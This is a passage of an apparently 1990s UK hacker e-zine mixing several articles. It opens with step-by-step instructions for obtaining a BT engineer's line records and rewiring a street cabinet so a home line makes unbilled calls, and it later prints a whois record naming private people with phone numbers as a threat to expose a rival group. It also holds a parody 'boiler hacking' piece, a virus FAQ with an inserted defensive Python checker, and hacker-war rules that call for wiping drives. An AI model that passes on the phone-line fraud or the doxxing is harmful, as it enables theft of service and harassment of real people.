With him he should bring a nice filo-fax with all his jobs in (all the places he's got to visit and their line info etc.) You now Have 3 options (i) KILL HIM!! and steal all his neat stuff * (ii) Act Intrested in his work and ask how he knows which line is yours say you want to do work experience in B.T etc/etc and he might show it to you and even explain it to you. (iii) Sabotage your line in such a way he's got to go up your pole , while he's trying to work out what the fuck you've done have a look at the filo-fax and write down all your info. * Not Recommended There are probally other ways to get your info ie. Bullshiting the B.T depot. or operators but they are not known my me , if anyone has any ideas i'd like to hear from them... STEP 2 : Decode When you have the filo-fax in your hands flick through it, near the end should be a page with your surname and telephone number.. below this should be the following .......... PCP E P DP PR 15 15 360 1922 4 What we are concerned with are the DP, PCP and P DP -- This is the pole, you can check this by going outside and looking at it . PCP/E -- This is the big green box have a look around your neighbourhood not to be confused with cable green boxes !!. P -- This is where your wire-pair are in the green box. The other letters are probally what contact your wire-pair is on the pole etc. Now You're Set To Go On An Adventure .. Wait until darkness falls , Put on your funky glow in the dark jackets, put the socket wrench in your pocket and take a visit to your local greener. Look around for nosey OAP's or other paranoid people. I actually had the shit kicked out of me by a large bloke who thought I was breaking into his house because I was looking very suspect walking around the streets stopping at the end of his road near the green box, ouch! On the front of the box there should be 2 diamond shaped things, pull out the wrench and undo them , the box should now open with ease.. 
You Should see loads of wires going all over the place. On the back of the left door there should be a white box (like you the one you plug your fone into back home) this is what the Enginerer uses for calls this is what we are going to swap with your house pair . How To Find Your Pair: There should be transparent plastic struts going from top to bottom, they have holes (where the wires come through) with very tiny numbers near them. The Struts are divided up into hundreds , So if your "P" was 360 you go along to the third strut and down until you find the tiny number 60 next to a hole. (see fig 1.18291739)In this hole should be some wire's, with luck they should be yours. Pull the wires out of the white-box and reconnect it to the wire pair going to your house. (the use of radios for checking might be a good idea) Fig 1.18291739 100-200 200-300 300-400 400-500 500-600 600-700 700-800 800-900 Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý-360 Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Ý Go Home And See if You Have A Dial Tone . Congratulations.... Your house is now ready for free calls .. Dial 175 and get your new fone Number Your old line will be in limbo so you might as well stop paying line rental, so tell B.T to disconnect it. Notes for use: If You're Leaving the dodgy line permanent then make sure you hide the wires well.. If you are going to get your old line cut-off then make sure all your wiring is back as it was before. Don't tell Stupid People your number. Don't call Operators etc. When we used this method we only connected the dodgy line when we needed it, so I don't know what will happen if left on a permenent basis ???!"* The information in this file came from alot of Trial & Error so some facts may be incorrect.. (Anyway it worked for us!). 
----------- WildFire -----------
----------- AWOL '97 -----------

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
===============================================================================
==[ MISC ]=====================[ .SECTION D. ]=======================[ MISC ]==
===============================================================================
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
1. Hacking Electrical Items Part 2, The Sequel : Tetsu Khan
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

LAst TiME wE WuZ Hax0Rin' ToAsTAz, So foR Dis TiMe i BeeN ThINkin On WhUT wE ShOUld hAx0R, aNd I ThOUghT, "eYe WiLL WrItE AbOuT....BOiLAhS!!! YeS, ThOsE boILaHs yEw FiNd In yOuR BaSEmEnt!!" AnD So I StArTed To pLaY ArouND WifF Muh BoiLAh AT h0me, NoW Yew caN REwt YoUr BoILah Tew!!!

FiNDiNg OuT dA OS ThaT ThA BoiLaH iZ RuNNiN'
--------------------------------------------

yEw Can DeW ThIS 3 WayZ...

1: LeWk FoR a StIcKA On It DaT Sez.
2: FiNd A CoNsOle On DA BoiLAh, ThEn, If IT hAs A kEYbOArd (DepEndZ oN MaNuFAcTuReR) tYpE "uname -a" AnD It WiLL Tell YeW!
3: FiNd Da ManUaL FoR YouR BOilaH (easiest way)

WhEn YoU KnOw YoUr BoILaHs oPeRATinG SyStEm, yEw cAN PRocEEd To Hax0R It...

---------------------------------------------------------------------------

Hax0RinG a BoILaH KaN BeE VeRy DangERous, LiKE Hax0Rin' A nuKelear PoWaHH sTAtIon, So MaKe sHuRe YeW dO ThE fOLLowiNG...

1: PuT oN PrOtECtivE CloThInG, LikE GloVeS, AnD a hAT, aNd MaYBe a sCarF, tHis Is BeCoS BaSEmEnts CaN bE CooOLD, aNd YEw WouLDnt WanT To CaTch A ChiLL wOULd YeW?
2: MaKE ShURe YeW HaVE A SpAnnEr Or WreNCH, As YoU WiLL NeEd ThEsE tO FiNd hIdDEn pOrTz AnD TeW Eye-PeE SpoOF fRom TruSteD HoStS (liKe a SinK, oR A pIpE, Or A WaSHing MaChInE)

LiKE WiV ToAsTeRz, We wILL fiRsT nEeD tO FiNd HiDDeN PoRtS, So wE NeEd To ScAn FoR tHem, bOilAhz ArE BiGGer tHan tOASterz, sO ThiS MaY tAke SoMe TiMe.
YeW cAn LeWk FoR SucH HiDDen PoRtS bY dOIng ThEsE tHinGs...

1: LeWKiNg ArOunD ThE BoILaH wIV yOUR EyeS.
2: TrAcInG PiPeS aLL ArOuND yOuR hOuSe (bit like traceroute programs do)
3: UsInG StEalTh TEkNiquEs By HidInG ArOuND yOuR hOuSE AnD LIsTENinG fOr WaTeR, liKE FrOm TaPs aNd StUFf...

If YoU dOnT FiNd AnY HIdDen PoRtS, ThEN YeW cAN JuST LoGiN FrOM a WaSHiNG MaChIne, Or OtHeR tRUstEd HoSt On ThE NeTwOrK, wHeN yOu COnnEcT tO tHa BoiLaH FRoM tHe WasHiNg MaChINe YeW wiLL sEe sOmeThInG LiKe ThIs...

+-------------------+
| GEneRaL eLeKTrIk  |
| M:0225            |
| S:b4588           |
| T:02              |
+-------------------+

BoiLaH OS RelEasE 2.54 (bIg BaAAadAss BoILaH)

login: BoiLaH
password:          <--- We AttEmPtid ThE DeFauLt "BoiLaH"

------------------------------------------------------------
L0ghINn GRaNTiD ***************
------------------------------------------------------------
WeLKoMe To bOiLAh [BOPR] bOiLiNg OpErAtIoNS PlaN rEsPonSe
------------------------------------------------------------
login on tty[wAShInG mAcHiNE]
last login from BaTHrEwm.COM on tty[ShOwEr] at 7:43p.m.

1: sHuTDoWn
2: CoLd WaTeR
3: hOt wAtEr
4: UNiX TyPE SheLL ENViRONMEnT

If YeW GhET THiS YEW ArE COOL)(#*$

Ok NoW CHEwZe NuMbAhh 4, ThEn YeWsE ThIS uniVeRSaL BoiLAhh ExPLoiT...

% fuck yew eye am eleet and k-r4d 'cos muh name iz ZeroCool!
fuck : command not found
% whoami
root
%

tHe bEst tImEs To ReWT BoILaHs Is lAtE aT nIgHt WhEn No-OnE Is LOggEd-In, CoS In ThA dAY, yEw GEt uSeRs LoGgEd iN To DoWLoAd WatEr AnD ShIt.

eYe WiLL KoNItuE wItH oTheR ExAMplEs NeXt TiMe!

T_K

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
2. Virus Definitions : so1o
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

This is for all you lame fucks out there who say I infect your systems with viruses, even when the only malicious shit I code are Windoze killers, anyway here are a few definitions, just so you know what you're on about next time =)

What are computer viruses (and why should I worry about them)?
--------------------------------------------------------------

According to Fred Cohen's well-known definition, a COMPUTER VIRUS is a computer program that can infect other computer programs by modifying them in such a way as to include a (possibly evolved) copy of itself. Note that a program does not have to perform outright damage (such as deleting or corrupting files) in order to be called a "virus". However, Cohen uses the terms within his definition (e.g. "program" and "modify") a bit differently from the way most anti-virus researchers use them, and classifies as viruses some things which most of us would not consider viruses.

Many people use the term loosely to cover any sort of program that tries to hide its (malicious) function and tries to spread onto as many computers as possible. (See the definition of "Trojan".) Be aware that what constitutes a "program" for a virus to infect may include a lot more than is at first obvious - don't assume too much about what a virus can or can't do!

These software "pranks" are very serious; they are spreading faster than they are being stopped, and even the least harmful of viruses could be fatal. For example, a virus that stops your computer and displays a message, in the context of a hospital life-support computer, could be fatal. Even those who created the viruses could not stop them if they wanted to; it requires a concerted effort from computer users to be "virus-aware", rather than the ignorance and ambivalence that have allowed them to grow to such a problem.

What is a Trojan Horse?
-----------------------

A TROJAN HORSE is a program that does something undocumented which the programmer intended, but that the user would not approve of if he knew about it. According to some people, a virus is a particular case of a Trojan Horse, namely one which is able to spread to other programs (i.e., it turns them into Trojans too). According to others, a virus that does not do any deliberate damage (other than merely replicating) is not a Trojan. Finally, despite the definitions, many people use the term "Trojan" to refer only to a *non-replicating* malicious program, so that the set of Trojans and the set of viruses are disjoint.

What are the main types of PC viruses?
--------------------------------------

Generally, there are two main classes of viruses. The first class consists of the FILE INFECTORS which attach themselves to ordinary program files. These usually infect arbitrary .COM and/or .EXE programs, though some can infect any program for which execution is requested, such as .SYS, .OVL, .PRG, & .MNU files.

File infectors can be either DIRECT ACTION or RESIDENT. A direct-action virus selects one or more other programs to infect each time the program which contains it is executed. A resident virus hides itself somewhere in memory the first time an infected program is executed, and thereafter infects other programs when *they* are executed (as in the case of the Jerusalem) or when certain other conditions are fulfilled. The Vienna is an example of a direct-action virus. Most other viruses are resident.

The second category is SYSTEM or BOOT-RECORD INFECTORS: those viruses which infect executable code found in certain system areas on a disk which are not ordinary files. On DOS systems, there are ordinary boot-sector viruses, which infect only the DOS boot sector, and MBR viruses which infect the Master Boot Record on fixed disks and the DOS boot sector on diskettes. Examples include Brain, Stoned, Empire, Azusa, and Michelangelo.
Such viruses are always resident viruses. Finally, a few viruses are able to infect both (the Tequila virus is one example). These are often called "MULTI-PARTITE" viruses, though there has been criticism of this name; another name is "BOOT-AND-FILE" virus.

FILE SYSTEM or CLUSTER viruses (e.g. Dir-II) are those which modify directory table entries so that the virus is loaded and executed before the desired program is. Note that the program itself is not physically altered, only the directory entry is. Some consider these infectors to be a third category of viruses, while others consider them to be a sub-category of the file infectors.

What is a stealth virus?
------------------------

A STEALTH virus is one which hides the modifications it has made in the file or boot record, usually by monitoring the system functions used by programs to read files or physical blocks from storage media, and forging the results of such system functions so that programs which try to read these areas see the original uninfected form of the file instead of the actual infected form. Thus the viral modifications go undetected by anti-viral programs. However, in order to do this, the virus must be resident in memory when the anti-viral program is executed.

Example: The very first DOS virus, Brain, a boot-sector infector, monitors physical disk I/O and re-directs any attempt to read a Brain-infected boot sector to the disk area where the original boot sector is stored. The next viruses to use this technique were the file infectors Number of the Beast and Frodo (= 4096 = 4K).

Countermeasures: A "clean" system is needed so that no virus is present to distort the results. Thus the system should be built from a trusted, clean master copy before any virus-checking is attempted; this is "The Golden Rule of the Trade." With DOS, (1) boot from original DOS diskettes (i.e. DOS Startup/Program diskettes from a major vendor that have been write-protected since their creation); (2) use only tools from original diskettes until virus-checking has completed.

What is a polymorphic virus?
----------------------------

A POLYMORPHIC virus is one which produces varied (yet fully operational) copies of itself, in the hope that virus scanners will not be able to detect all instances of the virus.

One method to evade signature-driven virus scanners is self-encryption with a variable key; however these viruses (e.g. Cascade) are not termed "polymorphic," as their decryption code is always the same and thus can be used as a virus signature even by the simplest, signature-driven virus scanners (unless another virus or program uses the identical decryption routine).

One method to make a polymorphic virus is to choose among a variety of different encryption schemes requiring different decryption routines: only one of these routines would be plainly visible in any instance of the virus (e.g. the Whale virus). A signature-driven virus scanner would have to exploit several signatures (one for each possible encryption method) to reliably identify a virus of this kind.

A more sophisticated polymorphic virus (e.g. V2P6) will vary the sequence of instructions in its copies by interspersing it with "noise" instructions (e.g. a No Operation instruction, or an instruction to load a currently unused register with an arbitrary value), by interchanging mutually independent instructions, or even by using various instruction sequences with identical net effects (e.g. Subtract A from A, and Move 0 to A). A simple-minded, signature-based virus scanner would not be able to reliably identify this sort of virus; rather, a sophisticated "scanning engine" has to be constructed after thorough research into the particular virus.
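Added example, not part of the original FAQ text or this zine: the integrity-checking approach that the stealth and polymorphic passages above point at. Instead of searching for signatures, it hashes every program against a baseline recorded on a clean system (the "Golden Rule" from the stealth section), and it also reports a newly appeared NAME.COM beside a baseline NAME.EXE, which DOS runs first and which a modification-only check would miss. The file names and contents are constructed sample data.

```python
"""Baseline integrity checker for a DOS program directory.

Added example, not part of the original article. The "directory" is a
dict {filename: bytes} so the whole thing runs offline; on a real
machine you would walk the disk instead. Both snapshots below are
constructed sample data, not real program images.
"""
import hashlib


def take_baseline(files):
    """Hash every file. The baseline is only trustworthy if it is taken
    after a clean boot: a resident stealth virus forges what reads of an
    infected file return, so hashing under its control records lies."""
    return {name: hashlib.sha256(data).hexdigest() for name, data in files.items()}


def check(baseline, files):
    """Compare a later snapshot to the baseline.

    modified  - hash differs (file infectors, polymorphic ones included:
                no signature is needed, only the fact that bytes changed)
    missing   - present in the baseline, gone now
    new       - not in the baseline at all
    companion - a new NAME.COM where the baseline had NAME.EXE; typing
                NAME at the DOS prompt runs the .COM first, so a checker
                that only looks for modified files never sees it
    """
    current = take_baseline(files)
    modified = sorted(n for n in baseline if n in current and current[n] != baseline[n])
    missing = sorted(n for n in baseline if n not in current)
    new = sorted(n for n in current if n not in baseline)

    baseline_exes = {n.upper()[:-4] for n in baseline if n.upper().endswith(".EXE")}
    companion = sorted(n for n in new
                       if n.upper().endswith(".COM") and n.upper()[:-4] in baseline_exes)
    return {"modified": modified, "missing": missing, "new": new, "companion": companion}


# Constructed sample data: a clean directory, then the same directory after
# a file infector has appended itself to WP.EXE and a companion virus has
# dropped EDIT.COM beside EDIT.EXE.
CLEAN = {
    "COMMAND.COM": b"command interpreter image (constructed)",
    "EDIT.EXE": b"MZ editor image (constructed)",
    "WP.EXE": b"MZ word processor image (constructed)",
}
INFECTED = dict(CLEAN)
INFECTED["WP.EXE"] = CLEAN["WP.EXE"] + b" + appended viral code (constructed)"
INFECTED["EDIT.COM"] = b"companion stub that chains to EDIT.EXE (constructed)"


if __name__ == "__main__":
    baseline = take_baseline(CLEAN)   # recorded while the system was clean
    for key, names in check(baseline, INFECTED).items():
        print(f"{key:10s} {names}")
    # modified   ['WP.EXE']
    # missing    []
    # new        ['EDIT.COM']
    # companion  ['EDIT.COM']
```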
The most sophisticated form of polymorphism discovered so far is the MtE "Mutation Engine" written by the Bulgarian virus writer who calls himself the "Dark Avenger". It comes in the form of an object module. Any virus can be made polymorphic by adding certain calls to the assembler source code and linking to the mutation-engine and random-number-generator modules.

The advent of polymorphic viruses has rendered virus-scanning an ever more difficult and expensive endeavor; adding more and more search strings to simple scanners will not adequately deal with these viruses.

What is a companion virus?
--------------------------

A COMPANION virus is one which, instead of modifying an existing file, creates a new program which (unknown to the user) gets executed by the command-line interpreter instead of the intended program. (On exit, the new program executes the original program so that things will appear normal.) The only way this has been done so far is by creating an infected .COM file with the same name as an existing .EXE file. Note that those integrity checkers which look only for *modifications* in *existing* files will fail to detect such viruses. (Note that not all researchers consider this type of malicious code to be a virus, since it does not modify existing files.)

Miscellaneous Jargon and Abbreviations
--------------------------------------

BSI = Boot Sector Infector: a virus which takes control when the computer attempts to boot (as opposed to a file infector).

CMOS = Complementary Metal Oxide Semiconductor: A memory area that is used in AT and higher class PCs for storage of system information. CMOS is battery backed RAM (see below), originally used to maintain date and time information while the PC was turned off. CMOS memory is not in the normal CPU address space and cannot be executed. While a virus may place data in the CMOS or may corrupt it, a virus cannot hide there.

DOS = Disk Operating System. We use the term "DOS" to mean any of the MS-DOS, PC-DOS, or DR DOS systems for PCs and compatibles, even though there are operating systems called "DOS" on other (unrelated) machines.

MBR = Master Boot Record: the first Absolute sector (track 0, head 0, sector 1) on a PC hard disk, that usually contains the partition table (but on some PCs may simply contain a boot sector). This is not the same as the first DOS sector (Logical sector 0).

RAM = Random Access Memory: the place programs are loaded into in order to execute; the significance for viruses is that, to be active, they must grab some of this for themselves. However, some virus scanners may declare that a virus is active simply when it is found in RAM, even though it might be simply left over in a buffer area of RAM rather than truly being active.

TOM = Top Of Memory: the end of conventional memory, an architectural design limit at the 640K mark on most PCs. Some early PCs may not be fully populated, but the amount of memory is always a multiple of 64K. A boot-record virus on a PC typically resides just below this mark and changes the value which will be reported for the TOM to the location of the beginning of the virus so that it won't get overwritten. Checking this value for changes can help detect a virus, but there are also legitimate reasons why it may change. A very few PCs with unusual memory managers/settings may report in excess of 640K.

TSR = Terminate but Stay Resident: these are PC programs that stay in memory while you continue to use the computer for other purposes; they include pop-up utilities, network software, and the great majority of viruses. These can often be seen using utilities such as MEM, MAPMEM, PMAP, F-MMAP and INFOPLUS.

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
3. Fun With whois, sinnerz.com : so1o
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

Lewk WhuT eyE FoUnd...
phish:~> whois sinerz.com [rs.internic.net] SIN (SINNERZ3-DOM) 130 105th Ave. S.E. Apt. 218 Bellevue, Wa 98004 USA Domain Name: SINNERZ.COM Administrative Contact: Kimminau, Suzette (SK2455) evilchic@NWLINK.COM (206)454-7176 Technical Contact, Zone Contact: Schmittel, Blair (BS469) blair@CYBER-NAUT.COM (801)654-3139 Record last updated on 26-Mar-97. Record created on 26-Mar-97. Domain servers in listed order: STRECH.CYBER-NAUT.COM 192.41.77.5 ITIS.EASILINK.COM 192.41.78.2 The InterNIC Registration Services Host contains ONLY Internet Information (Networks, ASN's, Domains, and POC's). Please use the whois server at nic.ddn.mil for MILNET Information. phish:~> fwhois sinnerz.com@nic.ddn.mil [nic.ddn.mil] No match for "SINNERZ.COM". Please be advised that this whois server only contains DOD Information. All INTERNET Domain, IP Network Number, and ASN records are kept in the Internet Registry, RS.INTERNIC.NET. ------------------------------------------------------------------------------- =--> S.I.N : [S] cared sh [I] tless lame fucks not-so-a [N] onymous. <--= ------------------------------------------------------------------------------- If sIn play this down as fake, why not phone up Evil Chic and ask if Suzey is there? You will soon find out the truth =) Expect details of all sIn members soon. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 4. Hacking Space Shuttles, Abort Codes : NailGun ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Okay, if you ever decide to hack a space shuttle (*.arc.nasa.gov is hacked very frequently) and you actually plan it all out, make sure you collect all the parts of this "mini-guide" of little things that are important and you will need to know, this section concerns.... SPACE SHUTTLE ABORT MODES ------------------------- Space Shuttle launch abort philosophy aims toward safe and intact recovery of the flight crew, orbiter and its payload. 
Abort modes include:

* Abort-To-Orbit (ATO) -- Partial loss of main engine thrust late enough to permit reaching a minimal 105-nautical mile orbit with orbital maneuvering system engines.

* Abort-Once-Around (AOA) -- Earlier main engine shutdown with the capability to allow one orbit around before landing at Edwards Air Force Base, Calif.; White Sands Space Harbor (Northrup Strip), N.M.; or the Shuttle Landing Facility (SLF) at Kennedy Space Center, Fla.

* Trans-Atlantic Abort Landing (TAL) -- Loss of two main engines midway through powered flight would force a landing at Banjul, The Gambia; Ben Guerir, Morocco; or Moron, Spain.

* Return-To-Launch-Site (RTLS) -- Early shutdown of one or more engines and without enough energy to reach Banjul would result in a pitch around and thrust back toward KSC until within gliding distance of the SLF.

STS-35 contingency landing sites are Edwards AFB, White Sands, Kennedy Space Center, Banjul and Ben Guerir, Moron.

Next time we will probably look at the payloads of space shuttles, l8r.

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
5. Country Domain Listing : SirLance
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

Listing Of Domains By Country, like *.fr *.uk etc. etc.
AD - Andorra - Andorre AE - Imarata al Arabiya al Muttahidah - Ittihad al Imirat alArabiya - United Arab Emirates AF - Afghanistan - Afghanestan AG - Antigua and Barbuda AI - Anguilla AL - Shqipëria - Albania AM - Armenia - Hayastan AN - Netherlands Antilles - Nederlandse Antillen AO - Angola AQ - Antarctica AR - Argentina AS - American Samoa AT - Austria - Osterreich AU - Australia AW - Aruba AZ - Azerbaijan - Azerbaycan BA - Bosnia and Herzegovina - Bosna i Hercegovina BB - Barbados BD - Bangladesh BE - Belgium - Belgique - Belgie BF - Burkina BG - Bulgaria BH - Bahrain - Bahrayn BI - Burundi BJ - Benin BM - Bermuda BN - Brunei BO - Bolivia BR - Brazil - Brasil BS - Bahamas BT - Bhutan BV - Bouvet Island - Bouvetoya BW - Botswana BY - Belarus - Byelarus' BZ - Belize CA - Canada CC - Cocos (Keeling) Islands (Australia) CF - Central Africa CG - Congo CH - Switzerland - Schweiz - Suisse - Svizzera - Svizra - Helvetia CI - Cote d'Ivoire CK - Cook Islands CL - Chile CM - Cameroon CN - China CO - Colombia CR - Costa Rica CS - Czechoslovakia CU - Cuba CV - Cape Verde - Cabo Verde CX - Christmas Island (Australia) CY - Cyprus CZ - Czech Republic - Cechy DD - Germany - Deutschland DE - Germany - Deutschland DJ - Djibouti DK - Denmark - Danmark DM - Dominica DO - Dominican Republic - Republica Dominicana DZ - Algeria - Jaza'ir EC - Ecuador EE - Estonia - Eesti EG - Egypt - Misr EH - Western Sahara ER - Eritrea ES - Spain - Espana ET - Ethiopia - Ityop'iya FI - Finland - Suomi FJ - Fiji FK - Falkland Islands FM - Micronesia FO - Faroe Islands - Faroyar FR - France FX - Metropolitan France GA - Gabon GB - United Kingdom GD - Grenada GE - Georgia - Sak'art'velo GF - French Guiana - Guyane GH - Ghana GI - Gibraltar (UK) GL - Greenland - Kalaallit Nunaat GM - The Gambia GN - Guinea - Guinee GP - Guadaloupe (France) GQ - Equatorial Guinea - Guinea Ecuatorial GR - Greece - Ellas GS - South Georgia GT - Guatemala GU - Guam GW - Guinea-Bissau - Guine-Bissau GY - Guyana HK - Hong 
Kong (UK) HM - Heard Island and McDonald Islands (Australia) HN - Honduras HR - Croatia - Hrvatska HT - Haiti HU - Hungary - Magyarorszag ID - Indonesia IE - Ireland - Éire IL - Israel - Yisra'el IN - India - Bharat IO - Indian Ocean Territory (UK) IQ - Iraq IR - Iran IS - Island - Iceland IT - Italy - Italia JM - Jamaica JO - Jordan - Urdun JP - Japan KE - Kenya KG - Kyrgyzstan KH - Cambodia - Kampuchea KI - Kiribati KM - Comoros - Comores KN - Saint Kitts and Nevis KP - Korea - Choson KR - Korea KW - Kuwait - Kuwayt KY - Cayman Islands KZ - Kazakhstan LA - Laos LB - Lebanon - Lubnaniyah LC - Saint Lucia LI - Liechtenstein LK - Sri Lanka LR - Liberia LS - Lesotho LT - Lithuania - Lietuva LU - Luxembourg LV - Latvia - Latvija LY - Libya - Libiya MA - Morocco - Maghrib MC - Monaca MD - Moldova MG - Madagascar MH - Marshall Islands MK - Macedonia - Makedonija ML - Mali MM - Burma - Myanma MN - Mongolia - Mongol Uls MO - Macau MP - Northern Mariana Islands MQ - Martinique (France) MR - Mauritania - Muritaniyah MS - Montserrat MT - Malta MU - Mauritius MV - Maldives MW - Malawi MY - Malaysia MZ - Mozambique - Mocambique NA - Namibia NC - New Caledonia - Nouvelle-Caledonie NE - Niger NF - Norfolk Island (Australia) NG - Nigeria NI - Nicaragua NL - Netherlands - Nederland NO - Norway - Norge NP - Nepal NR - Nauru NU - Niue NZ - New Zealand OM - Oman - Uman PA - Panama PE - Peru PF - French Polynesia - Polynesie Francaise PG - Papua New Guinea PH - Philippines - Pilipinas PK - Pakistan PL - Poland - Polska PM - Saint-Pierre et Miquelon PN - Pitcairn Islands PR - Puerto Rico PT - Portugal PW - Palau - Belau PY - Paraguay QA - Qatar RE - Reunion RO - Romania RU - Russia - Rossiya RW - Rwanda SA - Saudi Arabia - Arabiya as Suudiyah SB - Solomon Islands SC - Seychelles SD - Sudan SE - Sweden - Sverige SG - Singapore - Singapura SH - Saint Helena (UK) SI - Slovenia - Slovenija SJ - Svalbard og Jan Mayen SK - Slovakia - Slovensko SL - Sierra Leone SM - San Marino SN - Senegal 
SO - Somalia SR - Suriname ST - Sao Tome e Principe SU - Soviet Union - Sovietskiy Soyuz SV - El Salvador SY - Syria - Suriyah SZ - Swaziland TC - Turks and Caicos Islands TD - Chad - Tchad TF - Southern and Antarctic Lands - Terre Australes et Antarctiques TG - Togo TH - Thailand TJ - Tajikistan - Tojikiston TK - Tokelau (New Zealand) TM - Turkmenistan - Tiurkmenostan TN - Tunisia - Tunis TO - Tonga TP - Timor TR - Turkey - Turkiye TT - Trinidad and Tobago TV - Tuvalu TW - Taiwan - T'ai-wan TZ - Tanzania UA - Ukraine - Ukrayina UG - Uganda UM - United States Minor Outlying Islands US - United States of America UY - Uruguay UZ - Uzbekistan - Uzbekiston VA - Holy See VC - Saint Vincent and the Grenadines VE - Venezuela VG - Virgin Islands (UK) VI - Virgin Islands (USA) VN - Vietnam - Viet Nam VU - Vanuatu WF - Wallis et Futuna WS - Samoa YD - Yemen YE - Yemen YT - Mayotte (France) YU - Yugoslavia ZA - South Africa ZM - Zambia ZR - Zaire ZW - Zimbabwe

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
===============================================================================
==[ NEWS ]=====================[ .SECTION E. ]=======================[ NEWS ]==
===============================================================================
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
1. CoreWars : so1o / od|phreak
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

od|phreak was telling me about an idea he had, then called just "Hacker Wars" it was about teams, or groups of hackers who had a league system and hacked each others systems to gain points... We both made sets of rules and decided on a name also, CoreWars...Here are the rules as to date :

- 6 hackers per team.
- Each team has 2 systems.
- The systems must run linux, and be up 24/7.
- The game is played from a friday at midnight to a sunday at midnight (48 hours).
- On systems owned by the team, each user may have one account, with any systems priveleges.
- Each team has 1 account on each enemy system
  - 2.5mb quota per account
  - must be a normal user

Rules :
-------

- super users on opposing teams are NOT allowed to intervine with other hackers, this includes killing, writing to their terminals, or disturbing them in any way shape or form, however, super users are allowed to use snoop and other programs to monitor opposing team members, but they cannot DIRECTLY step in and kill the user. super users CANNOT delete files created by the opposing team members, however they ARE allowed to delete files if they have been MODIFIED, like /etc/motd.

- teams conquer a system by forcing it to be shut down, switched off, or any other measure that prevents persons from connecting or using that system. This can include rm'ng the hard drive or any other suitable measure.

The Winning Team Is The Last Team With A System That Has Not Been Shut Down.

if you shut a system down          : 100 points
